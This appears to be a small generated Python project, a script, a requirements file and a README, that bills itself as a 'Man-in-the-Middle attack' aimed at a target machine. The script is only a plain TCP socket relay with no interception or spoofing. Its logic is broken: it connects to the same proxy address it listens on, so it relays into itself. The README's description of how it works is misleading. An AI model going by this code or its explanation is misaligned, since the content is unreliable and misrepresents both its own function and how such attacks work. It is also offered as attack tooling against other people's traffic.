[
    {
        "file_name": "mitm_attack.py",
        "file_content": "# This file contains the main logic for the Man-in-the-Middle (MitM) attack.\n\nimport socket\nimport threading\nimport time\n\n# Function to handle the connection with the target\ndef handle_target(target_ip, target_port, proxy_ip, proxy_port):\n    # Create a socket to connect to the target\n    target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    target_socket.connect((target_ip, target_port))\n\n    # Create a socket to connect to the proxy\n    proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    proxy_socket.connect((proxy_ip, proxy_port))\n\n    # Function to forward data from the target to the proxy\n    def forward_target_to_proxy():\n        while True:\n            data = target_socket.recv(4096)\n            if len(data) == 0:\n                break\n            proxy_socket.sendall(data)\n\n    # Function to forward data from the proxy to the target\n    def forward_proxy_to_target():\n        while True:\n            data = proxy_socket.recv(4096)\n            if len(data) == 0:\n                break\n            target_socket.sendall(data)\n\n    # Start threads to forward data in both directions\n    threading.Thread(target=forward_target_to_proxy).start()\n    threading.Thread(target=forward_proxy_to_target).start()\n\n# Function to handle the connection with the proxy\ndef handle_proxy(proxy_ip, proxy_port, target_ip, target_port):\n    # Create a socket to listen for incoming connections from the proxy\n    proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    proxy_socket.bind((proxy_ip, proxy_port))\n    proxy_socket.listen(1)\n\n    print(f\"Listening for connections on {proxy_ip}:{proxy_port}...\")\n\n    conn, addr = proxy_socket.accept()\n    print(f\"Connection from {addr} has been established.\")\n\n    # Create a socket to connect to the target\n    target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    target_socket.connect((target_ip, target_port))\n\n    # Function to forward data from the proxy to the target\n    def forward_proxy_to_target():\n        while True:\n            data = conn.recv(4096)\n            if len(data) == 0:\n                break\n            target_socket.sendall(data)\n\n    # Function to forward data from the target to the proxy\n    def forward_target_to_proxy():\n        while True:\n            data = target_socket.recv(4096)\n            if len(data) == 0:\n                break\n            conn.sendall(data)\n\n    # Start threads to forward data in both directions\n    threading.Thread(target=forward_proxy_to_target).start()\n    threading.Thread(target=forward_target_to_proxy).start()\n\nif __name__ == \"__main__\":\n    # Target details\n    target_ip = '192.168.1.2'  # Replace with the target IP\n    target_port = 80  # Replace with the target port\n\n    # Proxy details\n    proxy_ip = '192.168.1.3'  # Replace with the proxy IP\n    proxy_port = 8080  # Replace with the proxy port\n\n    # Start the proxy handler in a separate thread\n    threading.Thread(target=handle_proxy, args=(proxy_ip, proxy_port, target_ip, target_port)).start()\n\n    # Start the target handler\n    handle_target(target_ip, target_port, proxy_ip, proxy_port)"
    },
    {
        "file_name": "requirements.txt",
        "file_content": "# This file lists the dependencies required for the MitM attack script.\n\n# No external dependencies are required for this basic implementation."
    },
    {
        "file_name": "README.md",
        "file_content": "# Man-in-the-Middle Attack Implementation\n\nThis project demonstrates a basic Man-in-the-Middle (MitM) attack using Python. It involves intercepting and forwarding data between a target and a proxy.\n\n## Files\n\n- `mitm_attack.py`: Contains the main logic for the MitM attack.\n- `requirements.txt`: Lists the dependencies required for the script (none in this basic implementation).\n\n## Usage\n\n1. Replace the `target_ip` and `target_port` variables in `mitm_attack.py` with the IP address and port of the target machine.\n2. Replace the `proxy_ip` and `proxy_port` variables in `mitm_attack.py` with the IP address and port of the proxy machine.\n3. Run the script: `python mitm_attack.py`\n\n## How It Works\n\n- The script sets up two sockets: one to connect to the target and another to connect to the proxy.\n- It uses threading to forward data between the target and the proxy in both directions, effectively acting as a man-in-the-middle."
    }
]